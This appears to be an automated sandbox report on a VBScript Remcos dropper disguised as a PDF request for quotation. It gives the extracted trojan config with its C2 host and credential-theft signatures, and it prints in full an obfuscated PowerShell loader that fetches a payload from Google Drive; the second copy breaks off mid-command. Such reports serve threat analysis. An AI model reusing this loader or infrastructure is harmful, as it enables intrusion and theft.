Analysis
-
max time kernel
299s -
max time network
280s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
18-11-2024 10:03
Static task
static1
Behavioral task
behavioral1
Sample
Fluor RFQ1475·pdf.vbs
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
Fluor RFQ1475·pdf.vbs
Resource
win10v2004-20241007-en
General
-
Target
Fluor RFQ1475·pdf.vbs
-
Size
15KB
-
MD5
695ec6cd0d4d8abaab5bed4e4f37153d
-
SHA1
027b2b36b69e9f41bc5b54493533d8b417192255
-
SHA256
3bb02f08d2d70b6f126d045a385a241330dbe96689304c48f1b9a1958297a060
-
SHA512
36a68f1693a03903990cf86eafe285cacab31b8b89a2a7c033e06545942604d8c735f4ff4d15d33c77e83379d74064954cd12a5fcb1bc3ea2b6cc289ef63ae1c
-
SSDEEP
384:aCTCJn/NHU8wde1pmZaKHQtL1YNBcYK7CB7qdgcKU:JuJnFH/w6pmmtl5WB7qm8
Malware Config
Extracted
remcos
RemoteHost
mtt9kw1mj.duckdns.org:23458
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
true
-
install_flag
false
-
keylog_crypt
true
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-28YJO8
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral2/memory/1708-93-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft behavioral2/memory/1096-87-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral2/memory/4776-86-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral2/memory/1096-87-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/memory/4776-86-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 13 IoCs
flow pid Process 4 2752 WScript.exe 9 3944 powershell.exe 11 3944 powershell.exe 39 1824 msiexec.exe 41 1824 msiexec.exe 43 1824 msiexec.exe 45 1824 msiexec.exe 46 1824 msiexec.exe 49 1824 msiexec.exe 50 1824 msiexec.exe 51 1824 msiexec.exe 53 1824 msiexec.exe 54 1824 msiexec.exe -
Uses browser remote debugging 2 TTPs 9 IoCs
Can be used control the browser and steal sensitive information such as credentials and session cookies.
pid Process 1016 Chrome.exe 584 msedge.exe 3296 msedge.exe 3832 msedge.exe 3776 Chrome.exe 2176 Chrome.exe 4416 Chrome.exe 912 msedge.exe 4472 msedge.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Control Panel\International\Geo\Nation WScript.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-940901362-3608833189-1915618603-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 8 drive.google.com 9 drive.google.com 39 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
pid Process 1824 msiexec.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 3476 powershell.exe 1824 msiexec.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1824 set thread context of 4776 1824 msiexec.exe 116 PID 1824 set thread context of 1096 1824 msiexec.exe 117 PID 1824 set thread context of 1708 1824 msiexec.exe 118 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language msiexec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer Chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ msedge.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 3016 reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3944 powershell.exe 3944 powershell.exe 3476 powershell.exe 3476 powershell.exe 3476 powershell.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 4776 msiexec.exe 4776 msiexec.exe 1708 msiexec.exe 1708 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 4776 msiexec.exe 4776 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 3776 Chrome.exe 3776 Chrome.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe -
Suspicious behavior: MapViewOfSection 4 IoCs
pid Process 3476 powershell.exe 1824 msiexec.exe 1824 msiexec.exe 1824 msiexec.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 4 IoCs
pid Process 584 msedge.exe 584 msedge.exe 584 msedge.exe 584 msedge.exe -
Suspicious use of AdjustPrivilegeToken 19 IoCs
description pid Process Token: SeDebugPrivilege 3944 powershell.exe Token: SeDebugPrivilege 3476 powershell.exe Token: SeDebugPrivilege 1708 msiexec.exe Token: SeShutdownPrivilege 3776 Chrome.exe Token: SeCreatePagefilePrivilege 3776 Chrome.exe Token: SeShutdownPrivilege 3776 Chrome.exe Token: SeCreatePagefilePrivilege 3776 Chrome.exe Token: SeShutdownPrivilege 3776 Chrome.exe Token: SeCreatePagefilePrivilege 3776 Chrome.exe Token: SeShutdownPrivilege 3776 Chrome.exe Token: SeCreatePagefilePrivilege 3776 Chrome.exe Token: SeShutdownPrivilege 3776 Chrome.exe Token: SeCreatePagefilePrivilege 3776 Chrome.exe Token: SeShutdownPrivilege 3776 Chrome.exe Token: SeCreatePagefilePrivilege 3776 Chrome.exe Token: SeShutdownPrivilege 3776 Chrome.exe Token: SeCreatePagefilePrivilege 3776 Chrome.exe Token: SeShutdownPrivilege 3776 Chrome.exe Token: SeCreatePagefilePrivilege 3776 Chrome.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 3776 Chrome.exe 584 msedge.exe 584 msedge.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 1824 msiexec.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2752 wrote to memory of 3944 2752 WScript.exe 83 PID 2752 wrote to memory of 3944 2752 WScript.exe 83 PID 3476 wrote to memory of 1824 3476 powershell.exe 106 PID 3476 wrote to memory of 1824 3476 powershell.exe 106 PID 3476 wrote to memory of 1824 3476 powershell.exe 106 PID 3476 wrote to memory of 1824 3476 powershell.exe 106 PID 1824 wrote to memory of 3896 1824 msiexec.exe 111 PID 1824 wrote to memory of 3896 1824 msiexec.exe 111 PID 1824 wrote to memory of 3896 1824 msiexec.exe 111 PID 3896 wrote to memory of 3016 3896 cmd.exe 113 PID 3896 wrote to memory of 3016 3896 cmd.exe 113 PID 3896 wrote to memory of 3016 3896 cmd.exe 113 PID 1824 wrote to memory of 3776 1824 msiexec.exe 114 PID 1824 wrote to memory of 3776 1824 msiexec.exe 114 PID 3776 wrote to memory of 1064 3776 Chrome.exe 115 PID 3776 wrote to memory of 1064 3776 Chrome.exe 115 PID 1824 wrote to memory of 4776 1824 msiexec.exe 116 PID 1824 wrote to memory of 4776 1824 msiexec.exe 116 PID 1824 wrote to memory of 4776 1824 msiexec.exe 116 PID 1824 wrote to memory of 4776 1824 msiexec.exe 116 PID 1824 wrote to memory of 1096 1824 msiexec.exe 117 PID 1824 wrote to memory of 1096 1824 msiexec.exe 117 PID 1824 wrote to memory of 1096 1824 msiexec.exe 117 PID 1824 wrote to memory of 1096 1824 msiexec.exe 117 PID 1824 wrote to memory of 1708 1824 msiexec.exe 118 PID 1824 wrote to memory of 1708 1824 msiexec.exe 118 PID 1824 wrote to memory of 1708 1824 msiexec.exe 118 PID 1824 wrote to memory of 1708 1824 msiexec.exe 118 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 2992 3776 Chrome.exe 120 PID 3776 wrote to memory of 4384 3776 Chrome.exe 121 PID 3776 wrote to memory of 4384 3776 Chrome.exe 121 PID 3776 wrote to memory of 3620 3776 Chrome.exe 122 PID 3776 wrote to memory of 3620 3776 Chrome.exe 122 PID 3776 wrote to memory of 3620 3776 Chrome.exe 122 PID 3776 wrote to memory of 3620 3776 Chrome.exe 122
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Fluor RFQ1475·pdf.vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2752 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Estivate Electrochronographic Kldet denationaliseringernes Decanting Sstridskrfters #><#Hundjvel Ubeslutsomstes Skvhovedet Sammenligningerne Indstuderingens #>$Bebyrdelsen='Undervisningsbruget';function Koffardifart($Enqueter100){If ($host.DebuggerEnabled) {$Rhamnal=4} for ($Fichu=$Rhamnal;;$Fichu+=5){if(!$Enqueter100[$Fichu]) { break }$Chaetosomatidae+=$Enqueter100[$Fichu]}$Chaetosomatidae}function Poppied($Platanista147){ .($hjertesorg) ($Platanista147)}$Elskoven=Koffardifart 'Thaun FeoE ,ertD la.UnleWRoboEJenfB.alecBe al GecINskeE ilfnKa at';$Ndtvungne=Koffardifart ' BorMFriso .ekzUd,aiK.ntlNonplmacra Tan/';$firemandswhistens=Koffardifart 'Sca TMyxolJossssu p1Gal 2';$frugtstand='Tera[ PilnBraneRe eT ver.VrinSF,adEInfoRUnmevInc.iOpslcUnaceB,rtp dgao ufiI KjeNPosttSa tmbylda Unvn,deiAPlatGTeleeD cyrCrts]Fejd:Hyme: barS Be EDownCmonsuMonyr Seei scaTAll yKrydpChooRDomiosvvetSka OTydeCPurpoForbLCant=Perf$ BarfIpabI droRvarieOxheMFa.raFrkhN ystdspigSErotwSkulHUnboISeeaSMolrT eucEpaafN tr.s';$Ndtvungne+=Koffardifart 'Poe,5genn.Data0Imp Uncl(UdklWAppriE hvnFrp dGearo pirwOxalsVulk sl.tNFishTMa n Trop1Kim 0S ud.Teos0over;.onp KoreWRepoiFeo nAngl6Pavi4sche; re. No oxSylt6Rvrd4 G.r; and G derTermv la:Mund1 Mar3A ri1Forb.unco0,ret)Trgh BedsGOpvie LemcMiddkDa aoFacs/,jov2Gosc0Reas1Hamp0,sym0Sk b1 Act0Subs1 Ich I faFA riiNon rSucce R sfSquuo A hxU.vo/Mass1m,ch3R.bb1Free. Tar0';$Oligoprothetic=Koffardifart 'RameU Jo s LifECom RThil- Wala ortgPrineMa.tnmumbt';$Valsede=Koffardifart 'Mangh afrtFl atAktip PedsLin :Mcen/Katu/Pl nd msarJuleiThe,vCirceBur .AmangIrraoUnd oP.otgenerlSkifeFord.MetacDiffo esmKamm/Folku.irtcCru ?App e.krmxKiddpUn,eo m nrAfbitProa= tatd TwioCorpwHortn RumlN rvoFaldaEk odRis &Eye iRevadUdry= .yg1E brgmonsxProb2 He EAssuzH mm0Valgd AnaXKar.C irc3H ndz f rOP.ee3Pels4Clem2Sm t-BlyaR Un x BrakSkinEAitsc al4Gol,d Do,-EcocMOverHDdssYSeptA.schkReim-TrespErhvE';$tttekammen=Koffardifart 'Hibe>';$hjertesorg=Koffardifart 'OveriNat,e Immx';$Redirigeringers='Risskov';$Tilbagekaldelsesordningen='\Houting.Gha';Poppied (Koffardifart ' id$Be tg P.pLS,bsoKor.bBlaaATenelProd: .nfS,anct,oolORettFDegeMsoapN RenGForeDSpeceFastsComm=R ta$NarceSaddNPrisVfrdi:E,hia Pr P TycPEskoD PatAReditKursAVan,+ Aha$ sk tSk biSu sl SkrbApana mrG naeDa.sk uraFi sLLaveDNeurECanclSkotS ondEBa dSPar OdeteRVegeDAcann ModI.aminHalfg TaoeNo mN');Poppied (Koffardifart ' sse$AlpeG Sk LLnenOAn mBOposa HonLLn t:PencodefiVSammeG,eaRSupebAyelYErhvGT mbnU exI utNForbGUlve=Obse$wareV Fl a enlEnr S epELuxedCon ERef..TelesGeompMozalUncoiSpejtFetu( Nar$Teo,t weat xtTBij eIdeak Sa aUns MMetoMSte ESkrinSttt)');Poppied (Koffardifart $frugtstand);$Valsede=$overbygning[0];$Brontosaur=(Koffardifart ' Lod$Skr g PolL ungODisaBPhota,joeLKlu :.vanBSte ROverE SunM Ko e feslT rpYSad =MellNZoneeGr.lWTilb-Ko tOFr lbmaskJHypoeNarccPattt Bag nseSbuchy,ubpsKazaTSemiE,cytMUnsp.E bl$StoreLay,lSydsSMar.K OutoPsalVbi.eet.lgn');Poppied ($Brontosaur);Poppied (Koffardifart 'Nive$KrypBRep,r cateTilsmDealeU velAlkyySt m.St,rHPrede O ea entdClaueBootrhac.s Dis[Ro,a$FrisOsa tl freiJe ngD,lioSpndp unerEndaoStettEr.ch S aeCu etWieni OricStal]Unde=Occi$receN rnd memtBeslvT avuS ojnlabig DamnForee');$Rubiginose=Koffardifart 'Triv$Ka mBPa er PaneKommm GrueI del ,ney eur.StraDAlkaoFremwH.linSi pl tao Bygaud,bd derFNontiUautlHaggeSste(Opve$BoolVVildaF sslEnnosP ile,ogodLogae Un.,Af.a$FuliAMahdmDalep CarhN.rdi .hig .quaProfm Disa StreOpa )';$Amphigamae=$Stofmngdes;Poppied (Koffardifart ' Sta$Sun gC deLsounOpauebOsteaKaftL Tan:s,yrbPrveuGamiTPhenIMaskkBezaSUbefSAmniT MonrGe tUVenikRecuTPlanUSpinRNo.b=Indl(Abnot ette ResSWl dt Kat- ConPBakkaLayeTTam HOps Rddi$ ArtAkonomH reP SkuH rdeIA,tigSupeAazalMHoglAGauceTrkk)');while (!$Butiksstruktur) {Poppied (Koffardifart 'Kall$ izzgt wblIndsoBi dbIndta DomlDobb:SlumS,mtalbackaOpstgFutut SpeeNivekMetrvAcutgUnca=G,ft$PleaMBefoyArguoPapinUncueMakauBasers mioDisomPalaa') ;Poppied $Rubiginose;Poppied (Koffardifart 'Trsts,kdetBayoASludr PartOutw-DiffsTot L BaleHemoe,krip B o Stor4');Poppied (Koffardifart ' Ind$ KobGDennLdesuocompBShoca Krol Un.:T rrbTreauTricT G.nIAer k ,yoSM lisDe at palrCrosuBaankunlotDisrUGarvr Tr =Slip( PretOvereAmniSas etSkri-U biPMenuaEkspTSerbHur t Aut$ AkkANomeMGuttpRetuhAdamiCompgvatiA mpaMAteiaEtouEAneu)') ;Poppied (Koffardifart 'Nemo$OvergKautLStroO LanB enta eziL Cha:G spSIndePRanuIarveRReariVisstRefoe Ki d UdflfljtyRask=Quat$AuragEquiLO riO LvsbBesyA cholPest:Ta gP SelIF emLH,rmT Para Na SSloyTTakte ukaRUndeS Ech+Afid+ Thu%Lok $SammO revOficEAislRSculBOmvey ForG RhaNA.toIUnocNHorsgse,v.AumeC Hi oAnt U asyNLe pT') ;$Valsede=$overbygning[$Spiritedly]}$Adventistens=301189;$Abetment=30028;Poppied (Koffardifart 'Omba$ Klag BruL fesobumbB Hyracar.L N n:Arr KSalvnFlytkByggBpresRAutod Ta eMollN.kolE Kr ept=Ekst Sli,GHel.E nteTToym-In,ocHemooK rlnConst irceVveiN omaTSur dea$Aft AIndlMHn ePfrimh mbriBotoG Co.A DaaMFly aPeasE');Poppied (Koffardifart 'Rr r$DogsgCy.llKr eoBranbPa.ma anlStap:MaryH UbeoemblfRandjFemog irae .aarBrndmKanaeTillsBatttExcerNedneEnvinAkseeBe a Foo= tje For[,sonSOlanyLudbs rictH skeg ycm For.PeebCBeslo S mnMatevR,toe SkurTegnt,ene] lar:Hjer: GniFReforAggeoDivimO,hrBBillaDe esTo veSila6Scle4FestSkejst linrI,pei IntnMu tgSt l( Unr$SwigKKrosnNo.skCatabR skr WhidTe re DivnRivee Gen)');Poppied (Koffardifart 'Tec $tolvgEnjelUpdroIntubWeatAS lll Un,: SabeFriglPr dV KeraEnnuN DagiWheet RreIPresCEven Eme=Orib Micr[ entSSav YdjvlSGregTFuldeThe MAgno.Te et LaneProcXCigaT Ph .Tetae MisnNsebCMe aofor DAnt.IskrmNRumfGNon ]Reng: Bam:.nphAP.roS Fa cAfteidiphi Sik. GolgPrene fr TRadiS ermTBdeprElitIKomfnSaksGBer ( us$Opp.h onsoRoguFBetwJS,orGBundeAfteRSl gm CuleKlipsbillT,terr SkaEBluenforme t i)');Poppied (Koffardifart 'B id$Va.aG BegLStilOPropB,uria DanLMagi:Lo sz illYstorgAfgaOUdfrdOejeaMortcSwirtunamY FleLTubii Res=U se$,rade arelUndev.redaHas.NFolkIEuorT kroiSpikCKvar.Pr.aSGeleu tomb ofeS ,poTJonsr ulI H pn yldGRo,b(Cyma$Mae ASandd,usaVgushEMellN aaht Enci TokS peT,oleE yggn Su s Bed,koda$ ,umAUnwhbcente Bilt .nbmAmirEDiskNSym THasp)');Poppied $zygodactyli;"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3944
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Estivate Electrochronographic Kldet denationaliseringernes Decanting Sstridskrfters #><#Hundjvel Ubeslutsomstes Skvhovedet Sammenligningerne Indstuderingens #>$Bebyrdelsen='Undervisningsbruget';function Koffardifart($Enqueter100){If ($host.DebuggerEnabled) {$Rhamnal=4} for ($Fichu=$Rhamnal;;$Fichu+=5){if(!$Enqueter100[$Fichu]) { break }$Chaetosomatidae+=$Enqueter100[$Fichu]}$Chaetosomatidae}function Poppied($Platanista147){ .($hjertesorg) ($Platanista147)}$Elskoven=Koffardifart 'Thaun FeoE ,ertD la.UnleWRoboEJenfB.alecBe al GecINskeE ilfnKa at';$Ndtvungne=Koffardifart ' BorMFriso .ekzUd,aiK.ntlNonplmacra Tan/';$firemandswhistens=Koffardifart 'Sca TMyxolJossssu p1Gal 2';$frugtstand='Tera[ PilnBraneRe eT ver.VrinSF,adEInfoRUnmevInc.iOpslcUnaceB,rtp dgao ufiI KjeNPosttSa tmbylda Unvn,deiAPlatGTeleeD cyrCrts]Fejd:Hyme: barS Be EDownCmonsuMonyr Seei scaTAll yKrydpChooRDomiosvvetSka OTydeCPurpoForbLCant=Perf$ BarfIpabI droRvarieOxheMFa.raFrkhN ystdspigSErotwSkulHUnboISeeaSMolrT eucEpaafN tr.s';$Ndtvungne+=Koffardifart 'Poe,5genn.Data0Imp Uncl(UdklWAppriE hvnFrp dGearo pirwOxalsVulk sl.tNFishTMa n Trop1Kim 0S ud.Teos0over;.onp KoreWRepoiFeo nAngl6Pavi4sche; re. No oxSylt6Rvrd4 G.r; and G derTermv la:Mund1 Mar3A ri1Forb.unco0,ret)Trgh BedsGOpvie LemcMiddkDa aoFacs/,jov2Gosc0Reas1Hamp0,sym0Sk b1 Act0Subs1 Ich I faFA riiNon rSucce R sfSquuo A hxU.vo/Mass1m,ch3R.bb1Free. Tar0';$Oligoprothetic=Koffardifart 'RameU Jo s LifECom RThil- Wala ortgPrineMa.tnmumbt';$Valsede=Koffardifart 'Mangh afrtFl atAktip PedsLin :Mcen/Katu/Pl nd msarJuleiThe,vCirceBur .AmangIrraoUnd oP.otgenerlSkifeFord.MetacDiffo esmKamm/Folku.irtcCru ?App e.krmxKiddpUn,eo m nrAfbitProa= tatd TwioCorpwHortn RumlN rvoFaldaEk odRis &Eye iRevadUdry= .yg1E brgmonsxProb2 He EAssuzH mm0Valgd AnaXKar.C irc3H ndz f rOP.ee3Pels4Clem2Sm t-BlyaR Un x BrakSkinEAitsc al4Gol,d Do,-EcocMOverHDdssYSeptA.schkReim-TrespErhvE';$tttekammen=Koffardifart 'Hibe>';$hjertesorg=Koffardifart 'OveriNat,e Immx';$Redirigeringers='Risskov';$Tilbagekaldelsesordningen='\Houting.Gha';Poppied (Koffardifart ' id$Be tg P.pLS,bsoKor.bBlaaATenelProd: .nfS,anct,oolORettFDegeMsoapN RenGForeDSpeceFastsComm=R ta$NarceSaddNPrisVfrdi:E,hia Pr P TycPEskoD PatAReditKursAVan,+ Aha$ sk tSk biSu sl SkrbApana mrG naeDa.sk uraFi sLLaveDNeurECanclSkotS ondEBa dSPar OdeteRVegeDAcann ModI.aminHalfg TaoeNo mN');Poppied (Koffardifart ' sse$AlpeG Sk LLnenOAn mBOposa HonLLn t:PencodefiVSammeG,eaRSupebAyelYErhvGT mbnU exI utNForbGUlve=Obse$wareV Fl a enlEnr S epELuxedCon ERef..TelesGeompMozalUncoiSpejtFetu( Nar$Teo,t weat xtTBij eIdeak Sa aUns MMetoMSte ESkrinSttt)');Poppied (Koffardifart $frugtstand);$Valsede=$overbygning[0];$Brontosaur=(Koffardifart ' Lod$Skr g PolL ungODisaBPhota,joeLKlu :.vanBSte ROverE SunM Ko e feslT rpYSad =MellNZoneeGr.lWTilb-Ko tOFr lbmaskJHypoeNarccPattt Bag nseSbuchy,ubpsKazaTSemiE,cytMUnsp.E bl$StoreLay,lSydsSMar.K OutoPsalVbi.eet.lgn');Poppied ($Brontosaur);Poppied (Koffardifart 'Nive$KrypBRep,r cateTilsmDealeU velAlkyySt m.St,rHPrede O ea entdClaueBootrhac.s Dis[Ro,a$FrisOsa tl freiJe ngD,lioSpndp unerEndaoStettEr.ch S aeCu etWieni OricStal]Unde=Occi$receN rnd memtBeslvT avuS ojnlabig DamnForee');$Rubiginose=Koffardifart 'Triv$Ka mBPa er PaneKommm GrueI del ,ney eur.StraDAlkaoFremwH.linSi pl tao Bygaud,bd derFNontiUautlHaggeSste(Opve$BoolVVildaF sslEnnosP ile,ogodLogae Un.,Af.a$FuliAMahdmDalep CarhN.rdi .hig .quaProfm Disa StreOpa )';$Amphigamae=$Stofmngdes;Poppied (Koffardifart ' Sta$Sun gC deLsounOpauebOsteaKaftL Tan:s,yrbPrveuGamiTPhenIMaskkBezaSUbefSAmniT MonrGe tUVenikRecuTPlanUSpinRNo.b=Indl(Abnot ette ResSWl dt Kat- ConPBakkaLayeTTam HOps Rddi$ ArtAkonomH reP SkuH rdeIA,tigSupeAazalMHoglAGauceTrkk)');while (!$Butiksstruktur) {Poppied (Koffardifart 'Kall$ izzgt wblIndsoBi dbIndta DomlDobb:SlumS,mtalbackaOpstgFutut SpeeNivekMetrvAcutgUnca=G,ft$PleaMBefoyArguoPapinUncueMakauBasers mioDisomPalaa') ;Poppied $Rubiginose;Poppied (Koffardifart 'Trsts,kdetBayoASludr PartOutw-DiffsTot L BaleHemoe,krip B o Stor4');Poppied (Koffardifart ' Ind$ KobGDennLdesuocompBShoca Krol Un.:T rrbTreauTricT G.nIAer k ,yoSM lisDe at palrCrosuBaankunlotDisrUGarvr Tr =Slip( PretOvereAmniSas etSkri-U biPMenuaEkspTSerbHur t Aut$ AkkANomeMGuttpRetuhAdamiCompgvatiA mpaMAteiaEtouEAneu)') ;Poppied (Koffardifart 'Nemo$OvergKautLStroO LanB enta eziL Cha:G spSIndePRanuIarveRReariVisstRefoe Ki d UdflfljtyRask=Quat$AuragEquiLO riO LvsbBesyA cholPest:Ta gP SelIF emLH,rmT Para Na SSloyTTakte ukaRUndeS Ech+Afid+ Thu%Lok $SammO revOficEAislRSculBOmvey ForG RhaNA.toIUnocNHorsgse,v.AumeC Hi oAnt U asyNLe pT') ;$Valsede=$overbygning[$Spiritedly]}$Adventistens=301189;$Abetment=30028;Poppied (Koffardifart 'Omba$ Klag BruL fesobumbB Hyracar.L N n:Arr KSalvnFlytkByggBpresRAutod Ta eMollN.kolE Kr ept=Ekst Sli,GHel.E nteTToym-In,ocHemooK rlnConst irceVveiN omaTSur dea$Aft AIndlMHn ePfrimh mbriBotoG Co.A DaaMFly aPeasE');Poppied (Koffardifart 'Rr r$DogsgCy.llKr eoBranbPa.ma anlStap:MaryH UbeoemblfRandjFemog irae .aarBrndmKanaeTillsBatttExcerNedneEnvinAkseeBe a Foo= tje For[,sonSOlanyLudbs rictH skeg ycm For.PeebCBeslo S mnMatevR,toe SkurTegnt,ene] lar:Hjer: GniFReforAggeoDivimO,hrBBillaDe esTo veSila6Scle4FestSkejst linrI,pei IntnMu tgSt l( Unr$SwigKKrosnNo.skCatabR skr WhidTe re DivnRivee Gen)');Poppied (Koffardifart 'Tec $tolvgEnjelUpdroIntubWeatAS lll Un,: SabeFriglPr dV KeraEnnuN DagiWheet RreIPresCEven Eme=Orib Micr[ entSSav YdjvlSGregTFuldeThe MAgno.Te et LaneProcXCigaT Ph .Tetae MisnNsebCMe aofor DAnt.IskrmNRumfGNon ]Reng: Bam:.nphAP.roS Fa cAfteidiphi Sik. GolgPrene fr TRadiS ermTBdeprElitIKomfnSaksGBer ( us$Opp.h onsoRoguFBetwJS,orGBundeAfteRSl gm CuleKlipsbillT,terr SkaEBluenforme t i)');Poppied (Koffardifart 'B id$Va.aG BegLStilOPropB,uria DanLMagi:Lo sz illYstorgAfgaOUdfrdOejeaMortcSwirtunamY FleLTubii Res=U 